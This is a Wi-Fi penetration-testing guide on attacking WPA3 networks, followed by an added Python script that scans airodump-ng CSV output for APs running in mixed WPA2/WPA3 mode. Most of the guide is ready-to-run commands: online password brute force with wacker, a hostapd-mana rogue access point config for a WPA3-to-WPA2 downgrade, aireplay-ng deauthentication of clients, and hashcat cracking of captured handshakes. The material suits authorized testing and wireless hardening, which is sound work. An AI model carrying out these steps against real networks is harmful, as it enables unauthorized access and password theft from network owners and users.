
Overview

WPA3 introduces SAE (Simultaneous Authentication of Equals), replacing the PSK handshake with a protocol resistant to offline dictionary attacks. However, WPA3 networks can still be attacked through online brute force or by exploiting clients configured to accept both WPA2 and WPA3.

Online Brute Force (wacker)

WPA3 does not expose a crackable handshake, but online brute force is still possible: each attempt connects to the AP and tests one password directly. This is slow, but viable against weak passwords.

cd ~/tools/wacker
./wacker.py --wordlist ~/rockyou-top100000.txt \
  --ssid <SSID> \
  --bssid <BSSID> \
  --interface wlan1 \
  --freq <FREQUENCY>

WPA3 → WPA2 Downgrade Attack

If the target AP supports both SAE and PSK (mixed mode) and clients are configured to accept WPA2, a rogue AP running WPA2 can capture the WPA2 handshake for offline cracking. Check the airodump-ng .csv for WPA2+SAE or PSK+SAE in the encryption column; either value indicates a mixed-mode AP. hostapd-mana config (saved as hostapd-downgrade.conf) that impersonates the AP as WPA2-only:

interface=wlan1
driver=nl80211
hw_mode=g
channel=<CHANNEL>
ssid=<TARGET-SSID>
mana_wpaout=handshake.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

hostapd-mana hostapd-downgrade.conf

Check whether the AP has MFP (802.11w) enabled. If it does not, deauthenticate the client to force it to reconnect to the rogue AP:

iwconfig wlan0mon channel <CHANNEL>
aireplay-ng wlan0mon -0 0 -a <REAL-BSSID> -c <CLIENT-MAC>

Once the handshake is captured, crack it:

hashcat -a 0 -m 22000 handshake.22000 ~/rockyou.txt --force

Convert the hccapx to 22000 format first if needed:

hcxhash2cap --hccapx=handshake.hccapx -c aux.pcap
hcxpcapngtool aux.pcap -o handshake.22000
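As an added example, not from the original page: a Python script that automates the mixed-mode check described above by scanning an airodump-ng CSV export for APs that offer both SAE and PSK. The CSV content is constructed, and the token spelling in the Privacy/Authentication columns ('WPA3 WPA2', 'SAE PSK') is an assumption about airodump-ng's export format; the resulting list is also what a WLAN owner would use to find APs still running in WPA2/WPA3 transition mode.

```python
import csv
import io

# Constructed airodump-ng style CSV (all values made up). Layout follows the
# tool's export: AP header row, one row per AP, a blank line, then stations.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6, 195, WPA3 WPA2, CCMP, SAE PSK, -40, 120, 0, 0.  0.  0.  0, 8, CorpNet1, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 195, WPA3, CCMP, SAE, -55, 98, 0, 0.  0.  0.  0, 8, CorpNet2, 
AA:BB:CC:DD:EE:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1, 130, WPA2, CCMP, PSK, -60, 77, 0, 0.  0.  0.  0, 5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

def parse_access_points(csv_text):
    """Return the AP rows as dicts keyed by header name. The AP section ends at
    the first blank line (the station section has its own header and is skipped).
    airodump-ng does not quote fields, so an ESSID containing a comma would
    mis-align its row; such rows are not repaired here."""
    ap_section = csv_text.split("\n\n", 1)[0]
    reader = csv.DictReader(io.StringIO(ap_section), skipinitialspace=True)
    rows = []
    for row in reader:
        cleaned = {k.strip(): (v or "").strip() for k, v in row.items() if k}
        if cleaned.get("BSSID"):
            rows.append(cleaned)
    return rows

def classify(ap):
    """Collapse Privacy/Cipher/Authentication into a token set and label the AP:
    'transition' (SAE and PSK both offered), 'sae-only', 'psk-only' or 'other'."""
    fields = (ap.get("Privacy", ""), ap.get("Cipher", ""), ap.get("Authentication", ""))
    tokens = {tok.upper() for field in fields for tok in field.split()}
    if "SAE" in tokens and "PSK" in tokens:
        return "transition"
    if "SAE" in tokens:
        return "sae-only"
    if "PSK" in tokens:
        return "psk-only"
    return "other"

def find_transition_mode_aps(csv_text):
    """APs advertising both SAE and PSK: the mixed-mode precondition for the WPA2
    downgrade described above, and the APs a WLAN owner should move to SAE-only."""
    return [{"bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": ap["channel"]}
            for ap in parse_access_points(csv_text) if classify(ap) == "transition"]

if __name__ == "__main__":
    for ap in find_transition_mode_aps(SAMPLE_CSV):
        print(f"{ap['bssid']}  ch {ap['channel']:>2}  {ap['essid']}  WPA2/WPA3 transition mode")
```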

Note on MFP (802.11w)

WPA3 mandates Management Frame Protection (MFP), which prevents deauthentication attacks. Check in Wireshark: if the RSN Capabilities field shows MFP required, deauth will not work against that client.